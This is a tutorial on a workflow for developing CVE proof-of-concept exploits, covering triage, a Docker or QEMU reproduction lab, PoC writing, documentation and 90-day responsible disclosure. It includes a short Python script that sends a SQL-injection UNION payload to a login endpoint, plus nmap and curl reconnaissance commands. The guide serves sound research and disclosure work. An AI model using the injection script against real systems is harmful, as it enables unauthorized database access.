Tutorial

CVE PoC Development Workflow

A reproducible workflow for developing proof-of-concept exploits: vulnerability analysis, reproduction, weaponization, and responsible disclosure.

  • #cve
  • #poc
  • #exploit
  • #disclosure

The workflow

Turning a vulnerability disclosure into a working PoC follows a repeatable process. This workflow has been validated across web, network, mobile, and IoT vulnerability classes.

Stage 1: Triage

When a potential vulnerability is reported or discovered, the first step is determining whether it is:

  • Reproducible — can you trigger it reliably?
  • Impactful — does it lead to data access, code execution, or privilege escalation?
  • Novel — is it a known CVE or a new finding?

Each CVE in the cve-pocs repo passes all three checks before a PoC is written.

Stage 2: Reproduction environment

Set up a controlled environment that mirrors the target:

docker compose -f docker-compose.vuln.yml up -d
# Target is now at http://localhost:8080 with the vulnerable version
nmap -p- localhost    # Identify open ports
curl -s http://localhost:8080 | head -20  # Fingerprint

For embedded/IoT targets, use QEMU emulation:

qemu-system-arm -M versatilepb -kernel vmlinuz -initrd initrd.img \
  -append "root=/dev/ram" -hda firmware_image.bin

Stage 3: PoC development

A good PoC has three properties:

  1. Deterministic — same input always produces the same result
  2. Minimal — no extraneous requests or side effects
  3. Self-contained — can be run with standard tools (curl, python3, netcat)
#!/usr/bin/env python3
"""CVE-XXXX-XXXX: PoC — SQL injection in login endpoint."""
import requests, sys

target = sys.argv[1]
payload = "' UNION SELECT 1,2,3,@@version,5-- "
r = requests.post(f"{target}/login", data={"user": payload, "pass": "x"})
print(r.text if "MySQL" in r.text else "Target may be patched")

Stage 4: Documentation

Every PoC in the repo includes:

  • CVE ID or tracking number
  • Affected versions — exact version range
  • Reproduction steps — CLI commands, not vague descriptions
  • Mitigation — version upgrade, config change, or WAF rule

Stage 5: Disclosure

Responsible disclosure timeline:

  1. Notify vendor with PoC and impact assessment
  2. Allow 90-day disclosure window
  3. If patched, publish PoC after CVE is published
  4. If unpatched after 90 days, publish with advisory

References